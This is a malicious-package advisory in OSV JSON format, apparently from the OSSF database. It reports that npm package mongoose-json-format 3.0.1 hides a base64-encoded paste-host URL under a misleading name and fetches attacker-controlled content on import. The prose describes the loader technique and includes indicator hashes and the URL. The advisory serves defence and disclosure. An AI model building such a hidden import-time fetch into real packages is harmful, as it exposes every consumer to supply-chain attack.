{"id":"MAL-2026-6499","summary":"Malicious code in mongoose-json-format (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5)\nOn require(), helpers.js instantiates a Helper whose constructor invokes createLog(). createLog() base64-decodes the string assigned to HASH_KEY (decoding to https://www.jsonkeeper.com/b/XVHGD, an anonymous mutable JSON paste host), fetches that URL, and passes the response body's `data.data` field as `threadContent` to createLogger() from the `log-format-thread` dependency. The package's advertised purpose is formatting Mongoose JSON output; there is no legitimate reason for it to retrieve content from a paste host at import time. The URL is hidden via base64 and given the misleading name HASH_KEY. Because jsonkeeper.com content is attacker-mutable and the fetched bytes are handed to a dependency for processing, any consumer that require()s this package becomes a vehicle for arbitrary attacker-controlled content delivered at import time.\n","modified":"2026-06-26T03:31:24.734006171Z","published":"2026-06-26T02:18:00Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-26T02:18:00Z","sha256":"2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5","id":"IN-MAL-2026-007580","versions":["3.0.1"],"source":"amazon-inspector","import_time":"2026-06-26T03:14:43.369667512Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/mongoose-json-format/v/3.0.1"}],"affected":[{"package":{"name":"mongoose-json-format","ecosystem":"npm","purl":"pkg:npm/mongoose-json-format"},"versions":["3.0.1"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"8f21df5695fa1442406e75bd4d1fa0013621e96fb3ecce51fe8d0bf19fc1a3016d6b84","sha256":"3d8d12245d3c6c871a78903c83a42578fc7b24c6c9c58c3a5251a537bb5cb881","path":"helpers.js"}],"package_integrity":[{"filename":"mongoose-json-format-3.0.1.tgz","hashes":{"sha512_sri":"sha512-bZealaIA6JsKHbeVaGoKn7umHT4opx7F8dX1e0bSMn7Hv2arWQjkfh2VqAorpyVZ/Hl4bNef0XATr52dBSyF/A==","sha1":"405689d0e26983f1d60b7dbdeef310427a047ed3"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mongoose-json-format/MAL-2026-6499.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}